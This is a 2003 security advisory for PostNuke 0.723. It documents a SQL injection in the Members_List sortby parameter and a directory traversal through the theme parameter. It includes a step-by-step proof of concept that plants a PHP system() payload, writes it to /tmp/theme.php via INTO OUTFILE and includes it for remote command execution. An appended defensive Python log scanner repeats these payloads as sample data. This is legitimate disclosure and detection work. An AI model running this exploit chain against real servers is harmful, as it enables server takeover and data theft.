postnuke723.txt

11 Mar 2003 | Reported by Pokleyzz | Type: packetstorm | Source: packetstormsecurity.com

Postnuke v 0.723 has SQL injection and directory traversal vulnerabilities documented.

Code
`Products: Postnuke v 0.723 (http://www.postnuke.com)  
Date: 09 March 2003  
Author: pokleyzz <pokleyzz_at_scan-associates.net>  
Contributors: sk_at_scan-associates.net   
shaharil_at_scan-associates.net   
munir_at_scan-associates.net  
URL: http://www.scan-associates.net  
  
Summary: Postnuke v 0.723 SQL injection and directory traversing  
  
Description  
===========  
Postnuke is a Web Content Management System written in PHP that uses MySQL   
as its database backend.  
  
Details  
=======  
There are multiple vulnerabilities in Postnuke v 0.723, as described below.  
  
1) SQL Injection in Members_List module  
  
The $sortby variable lacks error checking; it is only passed through stripslashes.  
This variable is used in the SQL query that selects the Postnuke member list.  
  
ex:  
  
http://[postnuke site]/modules.php?op=modload&name=Members_List&file=index&letter=[username]&sortby=[sql query]  
  
2) Directory traversing through $theme variable  
  
An attacker may include any file named theme.php.  
  
ex:  
http://[postnuke site]/index.php?theme=../../../../../../../../tmp  
  
Vendor Response   
===============   
The vendor was contacted on 24/02/2003 and a fix is available from   
http://www.postnuke.com  
  
  
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2378  
  
Proof of concept  
================  
Postnuke remote command execution  
  
requirement:  
- PostNuke v0.723, maybe other versions  
- PostNuke user  
- MySQL user must have permission to select into outfile (File_priv)  
  
1) Register as a Postnuke user.  
  
2) Log in as the user you just registered. After login, change your "Real name"   
to something like "<?system($HTTP_GET_VARS[cmd])?>" or just   
"<?system($cmd)?>"  
  
3) SQL injection in the "Members_List" module.  
Select user information into /tmp/theme.php.  
http://[postnuke site]/modules.php?op=modload&name=Members_List&file=index&letter=[your username]&sortby=uname+into+outfile+'/tmp/theme.php'%23  
  
4) Directory traversing in $theme variable  
Run command on server  
  
http://[postnuke site]/index.php?theme=../../../../../../../../tmp&cmd=[command]  
  
  
  
  
`
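
A defender-side check for the two request patterns this advisory describes, as an added example that is not part of the original advisory or of PostNuke's code: it scans web-server access-log lines and flags a Members_List `sortby` value that is not a bare column name and a `theme` value that is not a plain directory name. The allowlist patterns, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allowlists (assumed): sortby is a bare column name, theme is a single
# directory name with no path separators or dots.
SAFE_SORTBY = re.compile(r"[A-Za-z_]{1,32}")
SAFE_THEME = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    # parse_qs percent-decodes values and maps '+' to a space, so encoded
    # payloads are matched in decoded form.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = []
    # The advisory places the sortby flaw in the Members_List module.
    if "Members_List" in params.get("name", []):
        for value in params.get("sortby", []):
            if not SAFE_SORTBY.fullmatch(value):
                findings.append(("sortby-not-column-name", value))
    for value in params.get("theme", []):
        if not SAFE_THEME.fullmatch(value):
            findings.append(("theme-not-plain-name", value))
    return findings

def scan_log(lines):
    """Scan access-log lines; return (line_number, finding) pairs."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, f) for f in check_request(match.group(1)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2003:10:00:01 +0000] "GET /modules.php?op=modload'
    '&name=Members_List&file=index&letter=A&sortby=uname HTTP/1.0" 200 5120',
    '192.0.2.44 - - [10/Mar/2003:10:02:17 +0000] "GET /modules.php?op=modload'
    "&name=Members_List&file=index&letter=bob&sortby=uname+into+outfile+"
    "'/tmp/theme.php'%23 HTTP/1.0\" 200 812",
    '192.0.2.44 - - [10/Mar/2003:10:02:40 +0000] "GET /index.php?theme='
    '../../../../../../../../tmp HTTP/1.0" 200 301',
]

if __name__ == "__main__":
    for number, (rule, value) in scan_log(SAMPLE_LOG):
        print(f"line {number}: {rule}: {value!r}")
```

The same two patterns can serve as server-side input validation before `sortby` reaches the query or `theme` reaches an include path; the log scan only covers values sent in the query string.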
